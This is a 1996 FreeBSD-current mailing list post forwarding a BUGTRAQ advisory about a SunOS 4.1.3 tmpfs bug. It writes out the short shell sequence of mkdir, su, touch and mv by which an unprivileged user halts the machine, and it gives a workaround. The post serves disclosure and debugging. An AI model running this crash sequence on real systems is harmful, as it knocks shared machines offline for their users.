From owner-freebsd-current Sun Mar 3 02:03:44 1996 Return-Path: owner-current Received: (from root@localhost) by freefall.freebsd.org (8.7.3/8.7.3) id CAA06173 for current-outgoing; Sun, 3 Mar 1996 02:03:44 -0800 (PST) Received: from nervosa.com (root@nervosa.com [192.187.228.86]) by freefall.freebsd.org (8.7.3/8.7.3) with ESMTP id CAA06168 for ; Sun, 3 Mar 1996 02:03:40 -0800 (PST) Received: from nervosa.com (coredump@onyx.nervosa.com [10.0.0.1]) by nervosa.com (8.7.4/nervosa.com.2) with SMTP id CAA03000 for ; Sun, 3 Mar 1996 02:03:35 -0800 (PST) Date: Sun, 3 Mar 1996 02:03:33 -0800 (PST) From: invalid opcode To: FreeBSD-current Subject: Another tmpfs bug in SunOS 4 (fwd) Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-current@freebsd.org Precedence: bulk Hmm, could this be similar to our current problems with mv and panics? == Chris Layne ============================================================= == coredump@nervosa.com ================ http://www.nervosa.com/~coredump == ---------- Forwarded message ---------- Date: Sat, 2 Dec 1995 23:50:40 +0100 From: Arfst Ludwig To: Multiple recipients of list BUGTRAQ Subject: Another tmpfs bug in SunOS 4 Hi! Unprivileged users can crash the system such that a power down power up cyle is needed. Vulnerable OS is (at least) SunOS 4.1.3. With the right permissions (umask) the following sequence crahes the system. The kernel does not panic, nor the abort sequece enters the boot promt, the system is halted, need to power down. 8<------------------------- cut here ------------------------- user1> cd /tmp user1> mkdir foo user1> su user2 user2> mkdir foo/bar user2> touch foo/bar/{plop,blup} user2> exit user1> cd foo user1> mv bar .. 8<------------------------- cut here ------------------------- /tmp's permissons are drwxrwxrwt root wheel I have not explored this bug very much because of the ungracefully consequences. Workaround: Avoid using (the marvelous) TMPFS filesystems :-( or (IMHO even worse) switch to Solaris 2 ? Cheers, Arfst ______________________________________________________________________ __ (00) Arfst Ludwig \`\/ E-Mail: Arfst.Ludwig@luxor.in-berlin.de "" carpe diem